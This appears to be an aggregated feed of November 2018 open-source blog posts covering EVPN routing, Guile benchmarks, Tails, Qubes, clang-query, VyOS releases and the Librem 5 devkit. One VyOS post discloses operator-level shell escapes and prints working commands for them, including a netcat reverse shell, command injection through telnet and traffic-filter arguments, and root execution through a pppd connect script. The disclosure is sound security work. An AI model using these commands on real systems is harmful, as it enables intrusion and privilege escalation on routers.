Conventional wisdom with link-state protocols historically recommended limiting the number of routers and links in an area or level to prevent the database from growing too large and causing the Shortest Path First (SPF) calculation from taking too long. Most of those recommendations, particularly those suggesting as low as 200 routers in an area, are no longer valid. These suggestions were made for routers with single-core processors running at 600 MHz or less. Today, most datacenter switching platforms use 4-6 core processors as fast as 2.8 GHz, more than enough processing power for thousands of devices in a single area. Even for large datacenter networks scaling is not an issue for link-state protocols today.

The next consideration with link-state protocols is route filtering. Link-state protocols require every device in an area or level to have an identical picture of the network to determine the best path from, otherwise loops could form. To accomplish this, route filtering is only allowed between levels or areas. We want uniformity and consistency in the datacenter but reality is often not that kind to us in networking. There is always a rack, or a set of racks, or an extranet connection that requires special route filtering. A simple datacenter design puts everything in a single area, but this kind of exception makes filtering difficult or impossible. It may be that we never need to filter within the data center, but it’s an important consideration when deciding which protocol to deploy.

Finally, we need to consider peering and addressing within the underlay network. Cumulus has added support for OSPFv2 unnumbered removing the requirement of assigning a /30 or /31 on every single interface in the datacenter fabric. OSPFv3 is based on IPv6 link local peering, meaning there is also no requirement for /30 or /31 IPs on the point-to-point datacenter links. IS-IS is a little different and does not use IP at all and instead relies on a protocol called CLNS to find peers and exchange routes. As a result, once again no IPs are required in the datacenter fabric. This means any of the protocols pass the addressing test, just be sure OSPFv2 unnumbered is an option.

With all that being said, don’t forget that these link-state protocols all share state. If one device in the network changes, that information must be flooded to everyone. BGP, on the other hand, only sends this information to it’s immediate neighbor, limiting the “blast radius” or area of impact of bad behavior. Ivan Pepelnjak has a fantastic blog that briefly describes the problem with link-state protocols.

Now that we understand the considerations with deploying OSPF or IS-IS as an underlay, the important thing to remember is that with either protocol, we still have to run BGP over the top. This means that we are always configuring, troubleshooting and maintaining two routing protocols to enable EVPN. No matter how simple we can make the link-state protocol, it will still fall short. Since RFC 7938 describes how to build a BGP based underlay network and we require BGP for EVPN, there’s no motivation for either OSPF or IS-IS as an underlay.

The Case for BGP

When considering BGP in the datacenter we can use either iBGP or eBGP. Although RFC 7938 recommends eBGP, let’s discuss deploying iBGP in the datacenter first.

iBGP requires a full mesh of BGP peers; every router must create a BGP neighbor relationship with every other BGP speaker in the network. The solution to this is to deploy route reflectors to limit the number of peerings that are required in the environment. Even looking at a spine and leaf topology it’s easy to see that the spines should be deployed as iBGP route reflectors.

With iBGP Route Reflectors are required on the spines

The first problem here is that even with spines as route reflectors, we still require spine to spine iBGP peering. If only some of the spines are acting as route reflectors, those non-reflecting spines will need to peer to route reflectors. If we make all spines route reflectors we will need now need to define route reflector cluster IDs and still peer some route reflectors together to provide redundancy. The main reason is under a dual leaf uplink failure the leaf will respect iBGP rules and will not send routes learned from one iBGP neighbor to another iBGP neighbor.

A simplified diagram, but without redundant Route Reflectors a dual failure like this would prevent routing information from being sent from the non-RR spine.

Another possible solution would be to make all devices route reflectors, but this will lead to path hunting, seriously impacting network convergence time. Dinesh does a great job of detailing path hunting in his BGP in the Datacenter book.

The added complexity of designing route reflector clusters and managing the route reflector failure conditions makes iBGP the wrong choice in my book.

Using eBGP

Now that leaves us with eBGP as the last choice. As mentioned already, RFC 7938 gives us a number of the operational details we need to run eBGP, but let’s look at a few of them.

First using private ASNs gives us 1023 private ASNs or we can use 4-byte ASNs and have over 42 million ASNs available to use within the data center. In a standard two-tier Clos we would assign a unique ASN per leaf switches and a single ASN to every spine. It’s important that every leaf switch is in a unique ASN, otherwise BGP rules will drop routes that pass through an ASN the switch has assigned. You can override this behavior with a configuration knob like “allowas-in” or BGP’s “local-as” feature, but more knobs means more complexity with no value.

An example of how BGP ASNs are assigned in an eBGP fabric

Some vendors are pushing designs like this to allow for EVPN and you should always ask what value that additional complexity actually provides.

With Cumulus Linux’s BGP unnumbered there is no need to coordinate the ASN numbers across devices in the configuration since we can just use “net add bgp neighbor swp1 interface remote-as external” to configure an eBGP peer on the interface swp1 without specifying the remote-as number, only that it’s an eBGP peer.

We can use this single eBGP session to carry IPv4, IPv6 and EVPN traffic throughout the fabric. An initial concern may be passing EVPN information from leaf to spine, since the spines are not directly participating in EVPN, however it’s only data. These routes would not need to be installed on the spines and they act similar to route reflectors, passing on routing information from leaf to leaf.

The explicit configuration that BGP provides makes for easy automation and the single BGP session enables the end to end fabric for whatever you throw at it. Combine this with the operational ease spelled out in RFC 7938 and the case for why eBGP should be obvious!

Go try it yourself. You can run our EVPN demo either on your laptop with Cumulus Vx or in our datacenter with Cumulus in the Cloud!

The post Choosing an EVPN Underlay Routing Protocol appeared first on Cumulus Networks engineering blog.

13 November, 2018 08:00PM by Pete Lumbis

hackergotchi for ZEVENET


FileCloud load balancing article

This week, a new article is available in the howto section of the Knowledge Base. FileCloud enables a private cloud that makes your files accessible from any device from anywhere, but also synchronization across computers. It helps users share files seamlessly within or outside an organization. Check out further about high availability and scale FileCloud!


13 November, 2018 04:37PM by Zevenet


IT aus der Stadt, für die Stadt – der erste Marktplatz digitaler Möglichkeiten

Nach dem erfolgreichen und spannenden Open Government Tag am Donnerstag verwandelte sich der Saal des Alten Rathauses in München am Freitag, den 26. Oktober 2018, erstmals in den Marktplatz digitaler Möglichkeiten. Hierzu waren städtische Mitarbeiterinnen … Weiterlesen

Der Beitrag IT aus der Stadt, für die Stadt – der erste Marktplatz digitaler Möglichkeiten erschien zuerst auf Münchner IT-Blog.

13 November, 2018 08:22AM by Lisa Zech

hackergotchi for Grml developers

Grml developers

Frank Terbeck: That Scheme Performance

At this point, Scheme is my favourite language to program in. And my prefered implementation (…there are a lot) is GNU Guile. I've written a couple of pieces of software using it: Bindings for termios on POSIX Systems, An implementation of Linear Feedback Shift Registers, A unit test framework that emits TAP output, A system that produces time-sheets from Redmine Timing exports, An elaborate system to describe and experiment with configurable electronic parts and native implementation of the XMMS2 protocol and client library. That latter I've written about before.

Now with Guile there's a lot going on. The project as a small but dedicated team of developers. And they have been working on improving the system performance by a lot. For the longest time, Guile only had an interpreter. The last version of that was 1.8 — the version I came in contact with for the first time as well. Shortly after I started to dabble, 2.0 was released so I didn't have a lot of exposure to 1.8. Version 2.0 added a stack VM that Guile byte-compiled its code to. In 2017 the project released version 2.2, which saw the stack VM replaced by a register VM. And that improved performance dramatically. And now, they are preparing a 3.0 release (2.9.1 beta release happened on October the 10th of this year), which adds just-in-time native code generation on x86-64 via GNU Lightning.

I used xmms2-guile to get an idea about the improvements that the different Guile versions offer. I couldn't be arsed to build myself a 1.8 release so, this won't look at that. The setup is a minimal client connecting to an XMMS2 server, pull out the information required to display a playlist of about 15300 tracks. All of this is running on an Intel Core i7 with plenty of memory, running XMMS2 version 0.8 DrO_o (git commit: 3bd868a9).

As a point of comparison, I ran XMMS2's command line client to do the same task. It took a mean time of 10.77 seconds. That's about 1420 tracks processed per second. I'm pretty sure the client does a little more than it needs to, but this establishes a ballpark.

With Guile 2.0 the whole affair takes 23.9 seconds. That's about 640 tracks per second. Quite a bit slower. More than twice as slow. I was sure this would be slower than the official client, but the difference is disappointing. So what about 2.2 — can it do better?

Well, in Guile 2.2 the same job takes 6.38 seconds. 2400 tracks per second! Impressive. This is why I think the official CLI client implemented in C does a little too much work than it needs. It shouldn't lose to this, and if it would, it shouldn't be behind this much. My xmms2-guile client library is a native implementation. It doesn't wrap the official XMMS2 client library that's written in C. I'm way too lazy to do detailed timing analyses of the different libraries and Scheme implementations. The results are reproducible, though.

Now what about the upcoming Guile 3.0? I've used to be precise. It should execute a little faster, but the 2.2 results are pretty good already. Running the same setup yields a mean time of 5.87 seconds. A bit over 2600 tracks per second.

I mean sure, this is not an in-depth analysis, there's a local network connection involved and it's a rather specific repetitive task. Still though. Pretty cool when a random test shows that 3.0 is four times as fast as 2.0. ;)

13 November, 2018 01:33AM

hackergotchi for Tails


Tails report for October, 2018


The following changes were introduced in Tails 3.10.1:

  • Hide the PIM option when unlocking VeraCrypt volumes because PIM won't be supported until Tails 4.0. (#16031)

  • Rename the buttons in the confirmation dialog of Tails Installer to Install (or Upgrade) and Cancel to be less confusing. (#11501)


We finalized our work on the Additional Software feature. Small bugfixes will be shipped in the next release.

We are very proud that our work to unlock VeraCrypt volumes has landed in GNOME and is being included in other distributions, as mentioned in the release announcement of Ubuntu Cosmic Cuttlefish.

Distributing USB images

We started working on distributing USB images which will make installing Tails much easier on Windows and macOS:

  • We have a first version of the code to transform ISO images into USB images (#15293).

  • We wrote the instructions to install an USB image on Debian using GNOME Disks (#15659) and Windows (#15808) and macOS (#15809) using Etcher.

This work will be released in Tails 3.12 (January 29).

Documentation and website

  • We updated our roadmap for the next 2 years.

Hot topics on our help desk

  1. Several users reported #14754, Keyboard and mouse do not work after upgrading, but that was fixed in Tails 3.10.1.

  2. Many users are suffering from #15978 and are unable to automatically install software on their persistence, sometimes after interrupting the upgrade process.


  • Following-up on a process started in September, we were able to give more Tails developers access to our Jenkins CI platform. This should make their work more pleasurable and efficient.

  • We made great progress on our new DIY low-power backup server. We received the hardware, had great fun with Dremel tools and epoxy resin to make everything fit into the case, and finally installed the operating system. And what about… pictures? Here they are! :)

  • We did most of the work that will allow us to remove the outdated Gitolite instance we run on one of our systems. (#14587)

  • We ordered new drives to expand the storage capacity of our main server. (#16041)


We launched our yearly donation campaign and raised 18% of our goal in the first 2 weeks.


Past events


All the website

  • de: 51% (3148) strings translated, 6% strings fuzzy, 45% words translated
  • es: 58% (3593) strings translated, 1% strings fuzzy, 48% words translated
  • fa: 32% (1993) strings translated, 9% strings fuzzy, 34% words translated
  • fr: 88% (5412) strings translated, 1% strings fuzzy, 87% words translated
  • it: 33% (2063) strings translated, 4% strings fuzzy, 29% words translated
  • pt: 26% (1622) strings translated, 7% strings fuzzy, 22% words translated

Total original words: 64357

Core pages of the website

  • de: 83% (1580) strings translated, 8% strings fuzzy, 83% words translated
  • es: 97% (1851) strings translated, 1% strings fuzzy, 96% words translated
  • fa: 32% (615) strings translated, 12% strings fuzzy, 31% words translated
  • fr: 98% (1872) strings translated, 1% strings fuzzy, 98% words translated
  • it: 70% (1337) strings translated, 13% strings fuzzy, 69% words translated
  • pt: 45% (859) strings translated, 12% strings fuzzy, 48% words translated

Total original words: 17343


We wrote some code on the download page to compute download metrics in the future. (#14922).

  • Tails has been started more than 743,676 times this month. This makes 23,990 boots a day on average.
  • 10,158 downloads of the OpenPGP signature of Tails ISO from our website.
  • 117 bug reports were received through WhisperBack.

How do we know this?

13 November, 2018 01:23AM

November 12, 2018

hackergotchi for Ubuntu developers

Ubuntu developers

The Fridge: Ubuntu Weekly Newsletter Issue 553

Welcome to the Ubuntu Weekly Newsletter, Issue 553 for the week of November 4 – 10, 2018. The full version of this issue is available here.

In this issue we cover:

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

12 November, 2018 10:21PM

hackergotchi for Qubes


Qubes OS 3.2.1 has been released!

We’re pleased to announce the stable release of Qubes 3.2.1! As we previously announced, this is the first and only planned point release for version 3.2. Since no major problems were discovered with 3.2.1-rc1, this stable release is not significantly different from the release candidate. Features:

  • Fedora 28 TemplateVM
  • Debian 9 TemplateVM
  • Whonix 14 Gateway and Workstation TemplateVMs
  • Linux kernel 4.14

Release 3.2.1 has replaced Release 3.2 on the Downloads page.

What is a point release?

A point release does not designate a separate, new version of Qubes OS. Rather, it designates its respective major or minor release (in this case, 3.2) inclusive of all updates up to a certain point. Installing Qubes 3.2 and fully updating it results in the same system as installing Qubes 3.2.1.

What should I do?

If you’re currently using an up-to-date Qubes 3.2 installation, then your system is already equivalent to a Qubes 3.2.1 installation. No action is needed.

Regardless of your current OS, if you wish to install (or reinstall) Qubes 3.2 for any reason, then the 3.2.1 ISO will make this more convenient and secure, since it bundles all Qubes 3.2 updates to date. It will be especially helpful for users whose hardware is too new to be compatible with the original Qubes 3.2 installer.

As a reminder, Qubes 3.2 (and, therefore, Qubes 3.2.1) is scheduled to reach EOL (end-of-life) on 2019-03-28.

What about Qubes 4.0.1?

We recently announced the release of 4.0.1-rc1. You can help us test this release candidate and report any bugs you encounter so that they can be fixed before the stable release.

12 November, 2018 12:00AM

November 11, 2018

hackergotchi for Ubuntu developers

Ubuntu developers

Stephen Kelly: Future Developments in clang-query

Getting started – clang-tidy AST Matchers

Over the last few weeks I published some blogs on the Visual C++ blog about Clang AST Matchers. The series can be found here:

I am not aware of any similar series existing which covers creation of clang-tidy checks, and use of clang-query to inspect the Clang AST and assist in the construction of AST Matcher expressions. I hope the series is useful to anyone attempting to write clang-tidy checks. Several people have reported to me that they have previously tried and failed to create clang-tidy extensions, due to various issues, including lack of information tying it all together.

Other issues with clang-tidy include the fact that it relies on the “mental model” a compiler has of C++ source code, which might differ from the “mental model” of regular C++ developers. The compiler needs to have a very exact representation of the code, and needs to have a consistent design for the class hierarchy representing each standard-required feature. This leads to many classes and class hierarchies, and a difficulty in discovering what is relevant to a particular problem to be solved.

I noted several problems in those blog posts, namely:

  • clang-query does not show AST dumps and diagnostics at the same time<
  • Code completion does not work with clang-query on Windows
  • AST Matchers which are appropriate to use in contexts are difficult to discover
  • There is no tooling available to assist in discovery of source locations of AST nodes

Last week at code::dive in Wroclaw, I demonstrated tooling solutions to all of these problems. I look forward to video of that talk (and videos from the rest of the conference!) becoming available.

Meanwhile, I’ll publish some blog posts here showing the same new features in clang-query and clang-tidy.

clang-query in Compiler Explorer

Recent work by the Compiler Explorer maintainers adds the possibility to use source code tooling with the website. The compiler explorer contains new entries in a menu to enable a clang-tidy pane.

clang-tidy in Compiler Explorer

clang-tidy in Compiler Explorer

I demonstrated use of compiler explorer to use the clang-query tool at the code::dive conference, building upon the recent work by the compiler explorer developers. This feature will get upstream in time, but can be used with my own AWS instance for now. This is suitable for exploration of the effect that changing source code has on match results, and orthogonally, the effect that changing the AST Matcher has on the match results. It is also accessible via

It is important to remember that Compiler Explorer is running clang-query in script mode, so it can process multiple let and match calls for example. The new command set print-matcher true helps distinguish the output from the matcher which causes the output. The help command is also available with listing of the new features.

The issue of clang-query not printing both diagnostic information and AST information at the same time means that users of the tool need to alternate between writing

set output diag


set output dump

to access the different content. Recently, I committed a change to make it possible to enable both output and diag output from clang-query at the same time. New commands follow the same structure as the set output command:

enable output dump
disable output dump

The set output <feature> command remains as an “exclusive” setting to enable only one output feature and disable all others.

Dumping possible AST Matchers

This command design also enables the possibility of extending the features which clang-query can output. Up to now, developers of clang-tidy extensions had to inspect the AST corresponding to their source code using clang-query and then use that understanding of the AST to create an AST Matcher expression.

That mapping to and from the AST “mental model” is not necessary. New features I am in the process of upstreaming to clang-query enable the output of AST Matchers which may be used with existing bound AST nodes. The command

enable output matcher

causes clang-query to print out all matcher expressions which can be combined with the bound node. This cuts out the requirement to dump the AST in such cases.

Inspecting the AST is still useful as a technique to discover possible AST Matchers and how they correspond to source code. For example if the functionDecl() matcher is already known and understood, it can be dumped to see that function calls are represented by the CallExpr in the Clang AST. Using the callExpr() AST Matcher and dumping possible matchers to use with it leads to the discovery that callee(functionDecl()) can be used to determine particulars of the function being called. Such discoveries are not possible by only reading AST output of clang-query.

Dumping possible Source Locations

The other important discovery space in creation of clang-tidy extensions is that of Source Locations and Source Ranges. Developers creating extensions must currently rely on the documentation of the Clang AST to discover available source locations which might be relevant. Usually though, developers have the opposite problem. They have source code, and they want to know how to access a source location from the AST node which corresponds semantically to that line and column in the source.

It is important to make use a semantically relevant source location in order to make reliable tools which refactor at scale and without human intervention. For example, a cursory inspection of the locations available from a FunctionDecl AST node might lead to the belief that the return type is available at the getBeginLoc() of the node.

However, this is immediately challenged by the C++11 trailing return type feature, where the actual return type is located at the end. For a semanticallly correct location, you must currently use


It should be possible to use getReturnTypeSourceRange(), but a bug in clang prevents that as it does not appreciate the trailing return types feature.

Once again, my new output feature of clang-query presents a solution to this discovery problem. The command

enable output srcloc

causes clang-query to output the source locations by accessor and caret corresponding to the source code for each of the bound nodes. By inspecting that output, developers of clang-tidy extensions can discover the correct expression (usually via the clang::TypeLoc heirarchy) corresponding to the source code location they are interested in refactoring.

Next Steps

I have made many more modifications to clang-query which I am in the process of upstreaming. My Compiler explorer instance is listed as the ‘clang-query-future’ tool, while the clang-query-trunk tool runs the current trunk version of clang-query. Both can be enabled for side-by-side comparison of the future clang-query with the exising one.

11 November, 2018 10:46PM

hackergotchi for VyOS


The "operator" level is proved insecure and will be removed in the next releases

The operator level in VyOS is a legacy feature that was inherited from the forked Vyatta Core code. It was always relatively obscure, and I don't think anyone really trusted its security, and for good reasons: with our current CLI architecture, real privilege separation is  impossible.

Security researcher Rich Mirch found multiple ways to escape the restricted shell and execute commands with root permissions for the operator level users. Most of those would take a lot of effort to fix, and it's not clear if some of those can be fixed at all. Since any new implementation of a privilege separation system will be incompatible with the old one, and leaving operator level in the system is best described as "security theater", in the next releases that feature will be removed and operator level users will be converted to admin level users.

We will use the "id" UNIX command for demonstration since it's harmless but is not supposed to be available for operator level users. Here are proofs of concept for all vulnerabilities reported by Rich:

Restricted shell escape using the telnet command

Proof of concept:
user1@vyos> telnet ";bash"
telnet: can't connect to remote host ( Connection refused
# we are now in real, unrestricted bash

user1@vyos> id
uid=1001(user1) gid=100(users) groups=100(users),...

This problem could potentially be fixed, but since there's no way to introduce global input sanitation, every command would have to be checked and protected individually.

Restricted shell escape using the "monitor command" command

The "monitor command" command allows operator level users to execute any command. Using it in combination with netcat it's possible to launch an unrestricted bash shell:

user1@vyos> monitor command "$(netcat -e /bin/bash 192.168.x.x 9003)"

Connection from 192.168.x.x:59952
uid=1001(user1) gid=100(users) groups=100(users),4(adm),30(dip),37(operator),102(quaggavty),105(vyattaop)

Restricted shell escape using the traffic dump filters

user1@vyos> monitor interfaces ethernet eth0 traffic detail unlimited filter "-w /dev/null 2>/dev/null & bash"
Capturing traffic on eth0 ...

uid=1001(user1) gid=100(users) groups=100(users),4(adm),30(dip),37(operator),102(quaggavty),105(vyattaop)

Restricted shell escape using backtick evaluation as a set command argument

user1@vyos> set "`/bin/bash`"

user1@vyos> id >/dev/tty
uid=1001(user1) gid=100(users) groups=100(users),4(adm),30(dip),37(operator),102(quaggavty),105(vyattaop)

This one is special because there may not be a way to fix it at all.

Local privilege escalarion using pppd connection scripts

Operator level users are allowed to call pppd for the connect/disconnect commands. Since pppd is executed with root permissions, a malicious operator can execute arbitrary commands as root using a custom PPP connection script.

user1@vyos> echo "id >/dev/tty" >
user1@vyos> chmod 755

Execute the id command as root using the sudo /sbin/pppd command.

user1@vyos> sudo /sbin/pppd connect $PWD/
uid=0(root) gid=0(root) groups=0(root)

11 November, 2018 08:56PM by Daniil Baturin

hackergotchi for Tails


Our achievements in 2018

On October 12, we started our yearly donation campaign. Today, we summarize what we achieved with your help in 2018 and renew our call for donations.

New features

  • We integrated VeraCrypt in the desktop to allow you to work with encrypted files across different operating systems (Windows, Linux, and macOS).

    This work was done upstream in GNOME and will be available outside of Tails in Debian 10 (Buster) and Ubuntu 18.10 (Cosmic Cuttlefish).

  • Additional Software allows you to install additional software automatically when starting Tails.

    Add vlc to your additional software? 'Install Only Once' or 'Install Every Time'

  • We added a screen locker to give you some protection if you leave your Tails unattended, willingly or not.

  • We completely redesigned our download page and verification extension to make it easier to get and verify Tails. It is also now possible to verify Tails from Chrome.


  • Tails was used approximately 22 000 times a day.

  • We did more usability work than ever before. Every new feature was tested with actual users to make sure Tails becomes easier to use.

  • We answered 1123 bug reports through our help desk and helped all these people to be safer online.

Under the hood

  • We released 11 new versions of Tails to continue offering improvements and security fixes as soon as possible, including 4 emergency releases. This year we've faced critical security issues like Spectre, Meltdown, EFAIL, and issues in Firefox and are working hard to always have your back covered!

  • We made the build of Tails completely reproducible, which brings even more trust in the ISO images that we are distributing, a faster release process, and slightly smaller upgrades.

  • We greatly diversified our sources of income. Thanks to all of you, the share of donations that we got from individuals increased from 17% to 34%. This made our organization more robust and independent.


  • We published a social contract to clarify the social commitments that we stand by as Tails contributors.

  • We attended 12 conferences and connected to free software and Internet freedom communities in 8 different countries, including Chaos Computer Congress (Germany), FOSDEM (Belgium), Internet Freedom Festival (Spain), Tor Meeting (Italy and Mexico), Debian Conference (Taiwan), and CryptoRave (Brazil).

  • We grew our pool of regular contractors with 4 new workers, mostly to work on our core code and infrastructure. These include several very skilled Debian developers.

All of this is made possible by donations from people like you. And because they help us to plan our work, we particularly appreciate monthly and yearly donations, even the smallest ones.

If you liked our work in 2018, please take a minute to donate and make us thrive in 2019!

11 November, 2018 08:00AM

November 10, 2018

hackergotchi for SparkyLinux


Sparky 4.9 celebrates 100 years of Poland’s Independence

New live/install iso images of SparkyLinux 4.9 “Tyche” are available to download.
Sparky 4 is based on Debian stable line “Stretch” and built around the Openbox window manager.

Sparky 4.9 offers a fully featured operating system with a lightweight LXDE desktop environment; and minimal images of MinimalGUI (Openbox) and MinimalCLI (text mode) which lets you install the base system with a desktop of your choice with a minimal set of applications, via the Sparky Advanced Installer.

Sparky 4.9 armhf offers a fully featured operating system for single board mini computers RaspberryPi; with the Openbox window manager as default; and a minimal, text mode CLI image to customize it as you like.

Additionally, Sparky 4.9 is offered as a special edition with the code name “100” as well. This is a very special edition, commemorating the 100 anniversary of Poland’s independence. A purpose of it is a memorable stuff which provides some informations about Polish history to users of all the world.

New iso images features security updates and small improvements, such as:
– full system upgrade from Debian stable repos as of November 8, 2018
– Linux kernel 4.9.110 (PC)
– Linux kernel 4.14.71 (ARM)
– added key bindings of configuration of monitor brightness (Openbox)
– added key bindings of configuration of system sound (Openbox & LXDE)
– added cron configuration to APTus Upgrade Checker

Added packages:
– xfce4-power-manager for power management
– sparky-libinput for tap to click configuration for touchpads
– xfce4-notifyd for desktop notifications
– ‘sparky-artwork-nature’ package features 10 more new nature wallpapers of Poland

Changes in the „100” special edition:
– added „sparky100” theme pack, which provides a special background to: desktop, Lightdm login manager, GRUB/ISOLINUX boot manager and Plymouth
– added a sub-menu called „100”, separated in English and Polish, which provides menu entries to Wikipedia, to let you find out about Polish National Independence Day and others, important informations from Polish history as well.

SparkyLinux 4.9 100

There is no need to reinstall existing Sparky installations of 4.x line, simply make full system upgrade.

Sparky PC:
user: live
password: live
root password is empty

Sparky ARM:
user: pi
password: sparky
root password: toor

New iso/zip images of the stable edition can be downloaded from the download/stable page.

Many thanks go to Szymon “lami07” for testings, modifications and various improvements.

10 November, 2018 10:47PM by pavroo

November 09, 2018

hackergotchi for VyOS


VyOS 1.2.0-rc6 is available for download

As usual, every week we make a new release candidate so that people interested in testing can test the changes quickly and people who reported bugs can confirm they are resolved or report further issues.

VyOS 1.2.0-rc6 is available for download from

It includes a small but significant number of bugfixes and a couple of removed commands.

Package updates

VyOS 1.2.0-rc6 uses the Linux kernel 4.19.0. The 4.19 kernel will be the next LTS version, it should be a good kernel to stick with for the lifetime of the 1.2.0 release.

The 4.18 kernel was quite buggy, and 4.14.75 had annoying bugs with small packets causing packet loss in Xen that was solved in later versions.

This image also uses built-in drivers for Mellanox cards rather than those built from the official tarball, since they do not build for newer kernels yet. If you are using one of their fifth generation cards, let us know if it works for you.

Wireguard issues

Issues with creating multiple wireguard interfaces (T949) and with wireguard interfaces disappearing after reboot (T943) have been resolved.

Issues with removing long format IPv6 addresses from interfaces

It was always possible to use long format of IPv6 addresses, with leading zeroes, like 2001:db8:0:0:0:0:0:1/64 (T288), but it was impossible to delete them without rebooting the router because iproute2 does compacts addresses at set time and doesn't recognize the short and long forms as the same address. We've added a workaround for it and it should no longer be a problem.

Import route-map not set for IPv4 BGP peer groups

There was an issue with setting import route-map for IPv4 peer groups (T924). I have to admit I simply forgot to convert one of the commands to the new "address-family ipv4-unicast" syntax, so the path existed in the CLI, but was never passed to FRR correctly. Now it should work as expected.

New command for checking VyOS installation integrity

If you, like me, can never remember if you are running a stock image or a modified installation, this is for you.

dmbaturin@vyos:~$ show system-integrity 
The following packages don't fit the image creation time:
build time:     2018-11-06 01:28:00
installed: 2018-11-06 01:44:28  vyos-1x

It only shows is any packages were installed on top of the image, and not whether any files were modified, but that's better than nothing.

Removed commands

The "run show vpn debug detail" operational mode command was removed because it was based on a script that StrongSWAN no longer provides, and reimplementing it is probably more trouble than it's worth since it just aggregates information already available in the logs and output of other commands.

We have also removed the "set service dhcp-relay relay-options port" command. The DHCP RFC nowhere says that servers or relays MAY use a port other than UDP/67, and almost no clients support alternative ports either, so this option hardly has any practical value. If you used to use it, it will disappear from your config. If you actually need it, please tell us about your use case.

09 November, 2018 10:55AM by Daniil Baturin

hackergotchi for Ubuntu developers

Ubuntu developers

Tiago Carrondo: S01E09 – Ano do Linux!?

A conversa andou pelo assunto do momento: o chapéu azul resultante da aquisição da Red Hat pela IBM, (os novos) equipamentos comercializados com GNU/Linux incluindo os Thelios da System 76 e o smartphone e tablet da Pine64, novidades do UBports, os eventos que vão acontecer muito em breve, com especial destaque para o Secure Open Source day do qual somos Media Partners e vamos tentar fazer a melhor cobertura possível para todos os que não puderem estar presentes entre outras coisas!

Já sabes: Ouve, subscreve e partilha!


Este episódio foi produzido e editado por Alexandre Carrapiço (Thunderclaws Studios – captação, produção, edição, mistura e masterização de som) contacto: thunderclawstudiosPT–arroba–

Atribuição e licenças

A imagem de capa: q.phia em Visualhunt e está licenciada como CC BY.

A música do genérico é: “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)”, por Alpha Hydrae e está licenciada nos termos da CC0 1.0 Universal License.

Este episódio está licenciado nos termos da licença: Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0), cujo texto integral pode ser lido aqui. Estamos abertos a licenciar para permitir outros tipos de utilização, contactem-nos para validação e autorização.

09 November, 2018 12:49AM

hackergotchi for Purism PureOS

Purism PureOS

Librem 5 Development Kits: we are getting there!

A few weeks ago we published an update about the forthcoming of our Librem 5 development kits when we ran into some issues which caused delays. Today we’re bringing you another update on the hardware fabrication process, as well as some pictures and a video. At the same time as the last update got posted, I was on my way to California, where we are fabricating our development kit and base boards (we are bringing everything to life there, and shipping from that same facility).

The story of fabricating the entire devkit hardware from the ground-up included crossing paths with a couple of storms:

  • Hurricane Florence caused some shipping delays for component parts, and one of our packages also got lost in Memphis—maybe it enjoyed the music and drinks a bit too much? We don’t know because we never heard back from it again. So we had to procure additional parts.
  • The typhoon in south east China caused a week of factory shutdowns, which included our PCB design prototypes!
  • Almost right after that was a Chinese holiday, the Golden Week, which is in practice a two week holiday. Luckily we could expedite the PCBs at a fab in Los Angeles and courier ship to us!

All in all, we had a setback of about three weeks before we were able to make the first prototypes of the boards.

So once the PCBs finally arrived, on the same day we set up all the machines and worked until 5 a.m. to make the first 10 “golden sample” prototypes of the development base boards:

If you compare the produced boards with the 3D renders from KiCad (yes, the design of the base board is done in KiCad, and we will be releasing it under a free license once we are finished), you can see the beautiful similarity of the actual outcome. Here we have from left to right: the back side 3D render, the freshly made real board’s back side; the 3D rendered front and real board’s front:

Since then, our team has been furiously and restlessly working on “bringing up” the board, i.e. getting software up and running at least “as far as to be able to test all the peripherals” so that we can verify the base board design before we order the final 300+ boards for series production.

Since we base all our work on current mainline Linux kernel 4.18+, this work also involves quite a lot of forward porting of drivers, bug fixing and walking uncharted territory since the i.MX 8M is still very new. So far we have been able to verify the following (which also gives you an impression of the complexity of this task):

Validated Hardware Subsystems

  • Charge Controller
  • USB-C
  • Serial Downloader (loading u-boot via USB)
  • eMMC boot (boot mode switch in the “up” position)
  • SoM (pinout mostly validated, SoC, eMMC, and PMIC working)
  • UART Debug
  • Powering from 18650 battery
  • Charge controller’s thermistor
  • 10/100 Ethernet
  • Audio Codec
  • Mini-HDMI
  • WWAN module, SIM card & antenna
  • WWAN hardware kill switch
  • GNSS (UART interface & antenna)
  • USB Hub & SD controller
  • RedPine WiFi/BT M.2 module on SDIO
  • RTC
  • Haptic motor
  • push buttons (power button, reset button, volume up, & volume down)
  • User LED
  • Power indicator LEDs
  • headphones detect (HP_DET)
  • Display’s LED backlight
  • SPI NOR Flash
  • Earpiece speaker
  • External microphone
  • Headphone speakers
  • Smart card reader & smart card slot

Partially Validated Hardware Subsystems

  • IMU (accelerometer, gyro & magnetometer)
  • Proximity / ambient light sensor
  • WLAN/BT antennae
  • On-board microphone
  • Headset microphone
  • hardware kill switches for WiFi / BT and microphone

Subsystems Left To Validate

  • MIPI DSI LCD panel
  • Touch controller
  • Safely charging an 18650 battery
  • USB-C role switching
  • Microphone select IC
  • Bluetooth (UART4)
  • Camera (MIPI CSI)
  • WWAN I2S interface
  • JTAG
  • Bluetooth I2S interface

The MIPI DSI display interface is of course extremely important, and we can not order the final batch of PCBs before we know that the display (and touch controller) work perfectly. By doing the verification we also indeed discovered some problems, minor things that did not behave as expected and which we are now able to fix. Some other issues are simply mechanical issues that are hard to evaluate just from all the datasheets. And then other things happen, like parts not conforming to standards (like the M.2 WiFi/BT card, of which we got samples just a few days after doing the prototype order). For example, the M.2 card has some pretty thick components on the bottom layer and thus can not lay flush on the PCB (which had been an assumption we had when we designed the board), so we need to change the connector for the final boards.

This is how the fully equipped current devkit prototypes look like, WiFi/BT card is read in the lower right corner of the back side:

We are getting there!

All parts for the final production of the dev kits are procured and still waiting in the magazines on the machines to be placed on the final boards. The kernel team is making amazing progress on mainline Linux 4.18+, we are in intense communication with other Linux i.MX 8M mainlining partners. The kernel, the GPU drivers and MESA will see quite some i.MX 8M patches from us—and yes, upstream first was and is our motto, everything we do is and will be pushed upstream!

